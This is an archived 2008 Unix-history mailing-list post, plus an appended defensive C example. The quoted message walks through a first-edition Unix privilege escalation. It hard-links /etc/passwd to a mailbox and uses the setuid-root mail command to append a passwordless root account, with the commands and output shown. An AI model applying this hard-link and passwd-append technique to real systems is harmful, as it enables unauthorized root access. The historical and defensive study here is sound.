[TUHS] Some fun with 1st ed
Larry McVoy
lm at bitmover.com
Sun May 4 05:24:00 AEST 2008
We need to send out a security alert immediately. This is serious.
On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote:
> All work and no play...
>
> Here's a fun hack for first edition unix. From MAIL (I) :
>
> When followed by the names of a letter and one or more people, the
> letter is appended to each person's mailbox. Each letter is
> preceded by the sender's name and a postmark.
>
> A person is either the name of an entry in the directory /usr, in
> which case the mail is sent to /usr/person/mailbox, or the path
> of a directory, in which case mailbox in that directory is used.
>
> Mail is setuid root:
>
> # ls -l /bin/mail
> 80 surwr- 1 root 3940 Jan 1 00:00:00 mail
>
> login as a non-root user (ie "bin"), create a file "letter" with the
> contents "hack::0:/:". Run:
>
> @ ln /etc/passwd /tmp/mailbox
> @ mail letter /tmp
>
> log out and log back in as "hack". You are now root. Cat /etc/passwd
> and notice:
>
> From bin Jan 1 00:49:22
> hack::0:/:
>
> clean up the file a little and enjoy your new elevated status.
>
> Tim Newsham
> http://www.thenewsh.com/~newsham/
> _______________________________________________
> TUHS mailing list
> TUHS at minnie.tuhs.org
> https://minnie.tuhs.org/mailman/listinfo/tuhs
--
---
Larry McVoy lm at bitmover.com http://www.bitkeeper.com
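The trick quoted above works because the setuid-root mail appends to whatever file is named "mailbox" in the given directory, and a hard link makes that name refer to /etc/passwd. The check a privileged appender needs is sketched below as an added example; it is not part of the original thread or of first edition Unix, it assumes a modern POSIX system, and `safe_append` and `demo` are hypothetical names.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: append msg to path only if the opened file is a
 * regular file with exactly one name, owned by `owner`. 0 = ok, -1 = refused. */
int safe_append(const char *path, uid_t owner, const char *msg)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW);
    if (fd < 0) return -1;
    /* fstat the descriptor, not the path, so the check and the write
     * refer to the same inode. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    ssize_t n = write(fd, msg, strlen(msg));
    close(fd);
    return n == (ssize_t)strlen(msg) ? 0 : -1;
}

/* Constructed scenario: a stand-in "passwd" file and, optionally, a second
 * hard link named "mailbox" pointing at it, both in a fresh temp directory. */
int demo(int hardlinked)
{
    char dir[] = "/tmp/mboxdemoXXXXXX", target[64], mbox[64];
    if (!mkdtemp(dir)) return -2;
    snprintf(target, sizeof target, "%s/passwd", dir);
    snprintf(mbox, sizeof mbox, "%s/mailbox", dir);
    int fd = open(hardlinked ? target : mbox, O_CREAT | O_WRONLY, 0600);
    if (fd < 0) return -2;
    close(fd);
    if (hardlinked && link(target, mbox) != 0) return -2;
    int rc = safe_append(mbox, getuid(), "From bin Jan 1 00:49:22\n");
    unlink(mbox); unlink(target); rmdir(dir);
    return rc;
}

int main(void)
{
    printf("plain mailbox: %d, hard-linked mailbox: %d\n", demo(0), demo(1));
    return 0;
}
```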